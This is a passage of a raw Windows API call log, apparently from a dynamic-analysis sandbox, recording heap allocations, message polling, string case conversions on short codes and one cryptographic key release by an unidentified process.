[0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.660] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.660] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.660] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.661] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.661] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.661] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.661] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.661] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.661] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.662] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.662] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.662] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.662] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.662] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.662] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.662] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.663] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.663] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.663] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.663] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.663] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.663] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.663] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.664] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.664] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.664] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.666] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.667] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.667] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0254.667] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.667] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0254.667] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.667] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.668] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.668] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.668] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.668] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.668] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.669] CryptDestroyKey (hKey=0xaa5860) returned 1 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.669] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.669] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.669] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.669] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.670] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.670] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.670] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.670] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.670] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.670] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.670] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.670] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.671] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.671] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.671] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.671] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.671] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.671] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.671] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.671] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.672] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.672] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.672] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.672] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.672] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.672] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.673] CharUpperBuffW (in: 